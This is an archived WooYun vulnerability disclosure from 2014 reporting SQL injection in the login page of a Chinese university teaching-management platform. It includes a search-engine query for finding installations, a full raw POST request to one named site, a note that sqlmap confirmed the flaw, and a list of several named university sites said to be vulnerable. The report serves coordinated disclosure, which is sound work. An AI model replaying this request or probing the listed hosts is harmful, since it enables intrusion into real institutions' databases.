乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-23: 细节已通知厂商并且等待厂商处理中 2014-05-28: 厂商已经确认,细节仅向厂商公开 2014-05-31: 细节向第三方安全合作伙伴开放 2014-07-22: 细节向核心白帽子及相关领域专家公开 2014-08-01: 细节向普通白帽子公开 2014-08-11: 细节向实习白帽子公开 2014-08-21: 细节向公众公开
SQL
有前人提交过了该平台的GET注入,我只是走个顺风车而已 WooYun: 某教学管理平台通用SQL注入漏洞
1.厂商名称:南京先极科技有限公司2.官网:http://www.changedu.com/
google搜索:实践教学综合管理平台
以http://sy.cxxy.seu.edu.cn/这个为例
点击实验教学跳转到http://sy.cxxy.seu.edu.cn/syjx/index.aspx登录帐号入口
登录处帐号名加单引号直接报错
post数据:
POST /syjx/index.aspx HTTP/1.1Host: sy.cxxy.seu.edu.cnProxy-Connection: keep-aliveContent-Length: 779Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://sy.cxxy.seu.edu.cnUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://sy.cxxy.seu.edu.cn/syjx/index.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=sa2jea45ui55jse0lnexa3yq__VIEWSTATE=%2FwEPDwUJNDQxMTk0ODQwD2QWAgIED2QWDmYPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudGZkZAICDzwrAAkBAA8WBB8AFgAfAWZkZAIDDzwrAAkBAA8WBB8AFgAfAWZkZAIGDzwrAAkBAA8WBB8AFgAfAWZkZAIHDzwrAAkBAA8WBB8AFgAfAWZkZAIIDzwrAAkBAA8WBB8AFgAfAWZkZAIJDxAPFgIeC18hRGF0YUJvdW5kZxYCHghvbmNoYW5nZQUJT25DaGFuZygpDxYCAgECAhYCEAUJ5pWZ5Yqh5aSEZWcQBQzmsZ%2Foi4%2FmlZnogrIFEXd3dy5lYy5qcy5lZHUuY24vZ2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRNMb2dpbjEkSW1hZ2VCdXR0b24xBRRMb2dpbjEkSW1hZ2VCdXR0b24xMV3YP6N%2F5dc%2BoB4BMp6kWHCbUHdd&__EVENTVALIDATION=%2FwEWCALxmIavCQKUvNa1DwL666vdDALk27CmDALk29z9DgLFm%2BajDQK4ovrCAQKo2a%2BsDQt8C%2FrXU%2Buu%2BAdR8XQqFSkg2LOi&Login1%24UserName=admin&Login1%24PassWord=admin&Login1%24ImageButton1.x=18&Login1%24ImageButton1.y=12&Link=http%3A%2F%2Fwww.baidu.com
sqlmap验证:
[214 tables]好多表...
下面列举几例仅供测试:http://sy.cxxy.seu.edu.cn/syjx/index.aspx 东南大学成贤学院http://sjjx.siit.edu.cn:81/sysx/ 苏州工业职业技术学院http://syjx.njxzc.edu.cn/ 南京晓庄学院http://sjjx.siso.edu.cn/sysx/ 苏州工业园区服务外包职业学院http://210.38.64.108/shiyan/ 广东第二师范学院http://ndlab.nju.edu.cn/ 南京大学http://sjjx.njit.edu.cn/sy/ 南京工程学院http://dqhjsy.nuist.edu.cn/nxdsy/ 南京信息工程大学
我也不知道怎么构造关键字会适合一点,建议联系南京先极科技有限公司另外http://www.changedu.com/他们官网客户登录处也存在post注入请代为转告
登录入口界面均一致,加单引号也都报错,可看出是同系统
http://sy.cxxy.seu.edu.cn/syjx/index.aspx 东南大学成贤学院
http://sjjx.siit.edu.cn:81/sysx/ 苏州工业职业技术学院
http://syjx.njxzc.edu.cn/ 南京晓庄学院
http://sjjx.siso.edu.cn/sysx/ 苏州工业园区服务外包职业学院
http://210.38.64.108/shiyan/ 广东第二师范学院
危害等级:高
漏洞Rank:14
确认时间:2014-05-28 11:03
暂无